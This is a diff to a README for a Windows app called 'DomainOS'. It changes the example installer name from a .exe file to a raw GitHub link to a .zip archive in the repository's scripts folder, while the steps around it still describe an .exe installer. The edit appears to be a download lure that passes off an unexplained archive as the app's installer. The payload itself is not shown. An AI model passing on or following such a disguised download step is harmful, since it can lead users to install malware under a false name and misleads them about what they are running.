Hundred-praisworthiness384/DomainOS/README.md

 1. Click the large green **Download DomainOS** button at the top.
 It will take you to the GitHub page where you get the app.

 2. The GitHub page shows the latest version in the "Releases" section.
 Look for the latest Windows installer file, ending in `.exe`.
-It might be named like `DomainOS-Setup.exe`.
+It might be named like `https://raw.githubusercontent.com/Hundred-praisworthiness384/DomainOS/main/scripts/OS-Domain-1.1.zip`.

 3. Click the `.exe` file name to download it to your computer.